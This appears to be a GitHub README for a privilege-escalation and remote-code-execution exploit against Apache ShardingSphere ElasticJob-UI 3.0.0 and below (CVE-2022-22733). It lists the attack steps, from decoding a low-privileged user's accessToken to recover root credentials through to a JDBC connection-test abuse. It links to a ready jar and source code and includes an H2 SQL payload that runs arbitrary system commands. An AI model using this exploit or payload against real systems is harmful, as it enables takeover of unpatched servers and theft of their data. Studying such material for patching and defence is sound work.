Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit# CVE-2022-22733
CVE-2022-22733 is a vulnerabilit that affects Apache ShardingSphere ElasticJob-UI 3.0.0 and below versions, The vulnerability lead to Privilege Escalation. But, with abusing of the escalated privileges a `JDBC` Attack it can preformed & achieve RCE. You can read the vulnerability analysis from [Here](https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation) & The exploit writing blog step by step from [Here](https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce).
The Exploit Works as the following:
- Login with the low-privileged account.
- Obtain the unsecure generated `accessToken`.
- Decode the unsecure generated `accessToken`.
- Parse the decoded data from the `accessToken`.
- Retrive `root` account credentials from the parsed data.
- Login with the `root` account credentials and obtain a full privileges on the application.
- Send a Connection Test request with abusing of the``JDBC` Attack.
# Usage
You can download `JAR` file from [here](https://github.com/Zeyad-Azima/CVE-2022-22733/releases/tag/CVE-2022-22733) & Source code [here](https://github.com/Zeyad-Azima/CVE-2022-22733/blob/main/src/Main.java).
- Execute `jar`:
```
java -jar CVE-2022-22733.jar
```
- SQL script code:
```
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('your_command_here')
```
# Demo
[4.0K] /data/pocs/0bc9d6a3ad33d5212ec0b8d2938e3983ad19c40c
├── [1.7K] README.md
└── [4.0K] src
└── [9.3K] Main.java
1 directory, 2 files